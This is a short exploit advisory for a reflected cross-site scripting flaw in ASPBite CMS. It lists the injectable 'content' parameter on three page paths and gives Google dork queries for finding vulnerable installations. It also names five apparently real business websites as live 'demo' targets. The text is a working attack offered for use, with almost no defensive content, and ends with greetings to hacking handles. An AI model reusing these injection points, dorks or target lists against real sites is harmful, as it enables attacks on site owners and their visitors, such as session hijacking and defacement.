-----------IN THE NAME OF Allah--------------
Exploit : ASPBite CMS Content Management System Cross Site Scripting (XSS)
Discovered By : Mr.Cicili
CMS Download Page : http://aspbite.com
Google Dork : "inurl:content= inurl:aspbite/categories/index.asp?intCatID=" Or
"intext:Powered by ASPBite CMS Content Management System"
Exploit :
Put your Scripts here :
aspbite/categories/index.asp?intCatID="Id"&content={XSS}
aspbite/products/products.asp?intProductsID="id"&content={XSS}
aspbite/categories/index.asp?content={XSS}
Demo :
http://www.cookgroupltd.co.uk/aspbite/categories/index.asp?intCatID=66&content=">
http://www.prsmanchester.co.uk//aspbite/categories/index.asp?content=">
http://condensationproducts.co.uk/aspbite/products/products.asp?intProductsID=84&content=">
http://www.yorkshiredampcourse.co.uk/aspbite/categories/index.asp?intCatId=68&content=">
http://www.propertypreservationsystems.co.uk/aspbite/categories/index.asp?intCatID=52&content=">
Tnx : M.R.S.CO - black.king - b3hz4d - skote_vahshat - IrIsT - G3n3Rall
4ut0n0m0us - SpooferNinja - Nafsh